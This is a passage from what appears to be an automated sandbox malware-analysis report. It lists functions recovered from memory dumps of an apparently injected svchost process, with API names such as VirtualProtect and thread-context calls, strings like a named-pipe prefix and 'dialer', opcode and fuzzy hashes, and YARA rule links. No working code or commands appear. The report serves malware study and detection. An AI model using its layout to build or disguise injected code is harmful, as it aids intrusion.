555 257e1079c7b 547->555 571 257e1079a8b 550->571 572 257e1079a76-257e1079a80 call 257e107a99c 550->572 554->519 556 257e1079c80 555->556 556->524 566->556 567->546 567->547 571->473 575 257e1079a86-257e1079def call 257e10786ac call 257e107a3f4 call 257e10788a0 572->575 576 257e1079df0-257e1079df5 call 257e107baa8 572->576 575->576 576->516
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704
                                                                                Function 00000257E10AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328
                                                                                Function 00000257E10A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14
                                                                                Function 00000257E10AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                                Function 00000257E10A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 168117317CCF4186FB5FAB65BC4B39926D0BB89782F44C4A5DA0447396FB3AC4458728
                                                                                Function 00000257E10A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 1ca0844d76c3e8bd01ab4792baa35eba0e52544e90a3a5dfd8280d08fd67e20c
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: CB31F63139AF00E1EE1BDB02BC0BB5523D4B748BA2F5905659E2F4B792DF38C0458328
                                                                                Function 00000257E10B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 9ee7c4574fcb2fd013fb964aa6248de50fe65bdbb00ad364504beb63cc9ade48
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 3111BF31358F4086E756CB12FC4BB1972A4F388FE6F180265EA2A87794CF38C8148748
                                                                                Function 00000257E10A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 9a2b3325603176c98f4169559021404f9569204c8e58316270e8b4dcf71a70dc
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 60118B36348F4086EF199B22F80E76A62B4FB88B86F040468DE990B794EF3DC545C718
                                                                                Function 00000257E10A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 966c8cfc9cd363fdfda02b2bdcc18e9b8abbeec9a729aea55c5a0fc7a420839d
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: E6D1C976248F88C1DA75DB0AF89A35A77A0F388B85F104252EACD47BA9DF3CC551CB14
                                                                                Function 00000257E10A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: cdb653347486f95d6936b3a6e080e65dbc29c48c69199ff8dba1e233120f6aa2
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: CF31D232389F5186EA1ACF16FD4BB69A7A4FB44B86F084170AE4847B55EF34C4A18314
                                                                                Function 00000257E10ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: bbc7888f5e4037d8188519172c2121bad00389fe15c94999cae900f3cde1423e
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: A4114D703C8F8081FA6E97317E4F76D21516B487E2F1447A4B936466E6DE78C4018728
                                                                                Function 00000257E10A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 4c54e0cd68b01bb03e9099f5d5445d1d048295c9e60c374dc5866ed19de68462
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 48015731348F4082EA19DB52B89AB5A63A5F788FC2F888475DE5A43754DE38C989C704
                                                                                Function 00000257E10A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: f5791e389f93502f4c9fee8c8b73c305a7e67720a75c226d159784ea1be0102c
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 47011775259F4086EB2ADB22FC1F71A66B0BB99B87F0404A4DA5907764EF3DC148CB18
                                                                                Function 00000257E10A9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: dfda00a6953bd7fd31afee440e3a8cdc3f116b40ca32194e381a607924f2b4fb
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 4C51A132749B008AEB1EDB25FC4FB593796F344B89F1081A8DA1747788EB75E981C718
                                                                                Function 00000257E10A8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 7996f0918551bbe49c81effb0a51052158cdeed2e265b154e812129fb940380b
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A317832388B409AE71ADB21FC4BB5937A5F340B8AF158158AE5747789DB39D980C718
                                                                                Function 00000257E10A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d56e8e4ea1c63715ed7fae816492958a322087c5f1097162d2259ce4f6dc8c21
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: C2F06272348F4192EB65CF21FCDAB5A67A1F758BCAF848060DA4946954DF3CC68DCB04
                                                                                Function 00000257E10ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: a1c3fc9fb2c424eb5cf16538e388777059fc8f0e0a0ae8e1d12dd053b8120eaf
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: D9F06271359F0481EB1ACB29FC4FB6A6321FB88BA2F540299DA6A461E4DF3CC4448354
                                                                                Function 00000257E10A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 6788c6199675c10edf7c539ab1b1bd7f0a961ca82cbb9ee56a1611471c4650f0
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: E1F08C2038DF8482EA49CF13BD1F619A260AB48FC2F0880B0EE6A07B18DF3CC4458708
                                                                                Function 00000257E10A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 3bab7aea2da97d2c89cf869e435822f7947a441c0eb5686131a233f6f073e29f
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 8702F67225DB8086EBA5CB59F89635AB7A0F3C4785F104055EA8E87BA8DF7CC484CF14
                                                                                Function 00000257E10A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: 7c0b0c8c25f7da43d0dd52c625788ab6d70cb4887c3805681c3f7a601031dd5b
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: E261C77655DF40C6E76A8B1AF84A31AB7E0F388785F100155EA8E47BA8DB7CC444CF18
                                                                                Function 00000257E10B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 9bd224d7f8937e48dcb23c6a92691f7b715b7476c5eb2bebaeb9097fbf750117
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 3011A722FDCF5021F66E9568FC5FB6911406B783B6F180EA4A577876D6CA34CB41811C
                                                                                Function 00000257E1083504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a39f79cb811ea4c1becf5d789feaa45f4274d3385c809976c6f2e92f2461cad1
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: B911A7226DCF1119FA5E1529FC4F3693180EBD9376F4846B8A9660EFDACA78C8414228
                                                                                Function 00000257E107F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 8e9c97b707987eaf443330098e57a4151393cd7d99a53dd1af56ba60a02a01f1
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 7561D63268CF4042F66FFB69FD4F3B966A1F782742F514495DA2A07795DB34C8428308
                                                                                Function 00000257E10AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 84adbe2866ac1e2fb66f4364389380746c042a873a352a778f6fc0d74beb4a81
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: E961BD33608F88CAEB29DF65E88639D77A0F358B89F044255EF4A17B99DB38C084C714
                                                                                Function 00000257E10AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                                Function 00000257E107A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 83f5e9c311c848ec4fd2a0c7c7ec5783ac5279642614553dd1b91d6c427617f7
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 0E51D432148B80CAEB7AAF25B84B37877A0F354B86F1C8155FA8947BD5CB78D491C708
